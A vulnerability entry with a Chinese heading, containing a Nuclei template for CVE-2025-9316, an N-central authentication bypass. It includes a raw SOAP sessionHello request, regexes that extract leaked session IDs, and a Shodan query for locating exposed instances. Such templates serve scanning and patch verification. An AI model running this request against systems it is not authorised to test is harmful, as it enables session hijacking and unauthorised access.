漏洞描述
N-central < 2025.4 can generate sessionIDs for unauthenticated users This issue affects N-central: before 2025.4.
CVE-2025-9316: N-central - Authentication Bypass
PoC代码[已公开]
id: CVE-2025-9316
info:
name: N-central - Authentication Bypass
author: DhiyaneshDK,horizon3ai
severity: medium
description: |
N-central < 2025.4 can generate sessionIDs for unauthenticated users This issue affects N-central: before 2025.4.
impact: |
Attackers can hijack sessions without authentication, potentially leading to unauthorized access.
remediation: |
Update to version 2025.4 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-9316
- https://github.com/horizon3ai/n-able_n-central_xxe_file_read/blob/main/ncentral_xxe_file_read.py
metadata:
verified: true
max-request: 2
shodan-query: http.title:"N-central Login"
tags: cve,cve2025,n-central,session-leak
http:
- raw:
- |
POST /dms/services/ServerUI HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
Soapaction: ""
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<sessionHello>
<applianceID>3</applianceID>
</sessionHello>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "SessionID"
- "sessionHelloResponse"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<SessionID[^>]*>(\d+)</SessionID>'
- '<sessionId>(\d+)</sessionId>'
- '<sessionID>(\d+)</sessionID>'
# digest: 4a0a00473045022067704f86d667e23e14b2b01e75851b79e4d37db7f2cc4341061c7dcc303de4a2022100df8e5c3cf5ee51acbcd927722d83ead1e3b6796604d342a80c53e734abe96dff:922c64590222798bb761d5b6d8e72950